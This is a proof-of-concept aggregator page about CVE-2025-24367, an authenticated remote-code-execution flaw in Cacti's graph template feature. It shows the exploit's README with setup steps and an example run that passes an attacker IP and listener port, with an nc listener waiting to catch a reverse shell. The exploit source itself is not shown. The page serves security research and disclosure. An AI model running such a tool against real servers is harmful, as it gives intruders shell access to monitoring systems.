Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24367 PoC — Cacti 安全漏洞

Source
Associated Vulnerability
Title:Cacti 安全漏洞 (CVE-2025-24367)
Description:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti存在安全漏洞,该漏洞源于认证用户滥用图形创建和图形模板功能,可在应用程序的Web根目录中创建任意PHP脚本,导致远程代码执行。
Description
Proof of Concept for CVE-2025-24367
Readme
# CVE-2025-24367 - Cacti Authenticated Graph Template RCE
# Usage & Safety

> **Important — Read this first:**  
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.

---

## Requirements

- Python 3.8+

```bash
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
```

---

## Usage

```text
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
```

### Example

Before running the script make sure you have a nc listener running. Run the script without proxy unless debugging:

```bash
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost
```

---

## VERY IMPORTANT WARNINGS

- **Do not run this against production systems or any system you do not own or have explicit permission to test.**
- Always obtain **written authorization** before performing security testing.
- Use isolated lab environments (e.g., VMs, containers, or purpose-built test networks) for experimentation.
- Your organization may have reporting and disclosure policies — follow them.
- The authors accept no responsibility for misuse of this code.

**Final reminder:** This script and README are for **educational use only**. Never use these tools to access systems unlawfully.
File Snapshot

[4.0K] /data/pocs/92cbbde36402f290f268b52109a526ab51b5a843 ├── [8.3K] exploit.py └── [1.6K] README.md 1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.